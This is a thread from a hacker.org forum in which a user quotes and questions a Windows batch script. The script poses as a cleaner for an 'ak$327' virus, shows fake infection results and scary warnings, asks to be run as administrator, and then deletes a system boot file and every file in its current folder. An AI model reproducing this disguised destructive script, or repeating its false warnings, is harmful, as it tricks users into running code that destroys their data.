CMD

Discussion about hacker.org's server
Liidian
Posts: 202
Joined: Fri Jun 05, 2009 10:49 pm
Location: Guess

Re: Dont try This At You Computer

Post by Liidian »

Anovamatrix wrote:@echo OFF
echo This program will purge any ak$327 viruses on your computer.
echo SEARCHing (lots of text, may take a while, just
echo wait, will beep when finished.)
pause
cd C:\
dir /s
echo
echo
echo
echo Done searching, PRESS ENTER or RETURN KEY TO DISPLAY
pause>nul
echo Displaying infected files
echo Files infected with ak$327:
echo short full
echo 1:pacerprf.ini displaying on next line
echo Full path:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
echo 2:memtest.exe C:\Windows\Boot\PCAT\memtest.exe
pause
echo WARNING
echo MEMTEST.EXE WILL PERMENENTLY DELETE YOUR
echo SYSTEM ON A SPECIFIED DATE!
ECHO DELETE IMMEDIATLY, OR LET ME!
echo close now if you want to delete it yourself.
echo otherwise press space
echo note to please run this on an ADMINISTRATOR account.
pause>nul
echo Confirm if prompted by pressing y then enter or return........
del C:\Windows\Boot\PCAT\memtest.exe
Pause
echo thanks for using this program, please delete this too:
echo C:\Windows\inf\Psched\0009\pacerprf.ini
pause@echo off
del *.*
The only thing that actually does is deletes all files but folders... amd some others.... may i ask you what does you call that file? a virus?
The whole "system" is a number of people creating a code all together, this code loops and is there for a "system".
System Zero could also be confirmed with one word "Hacker's"
Post Reply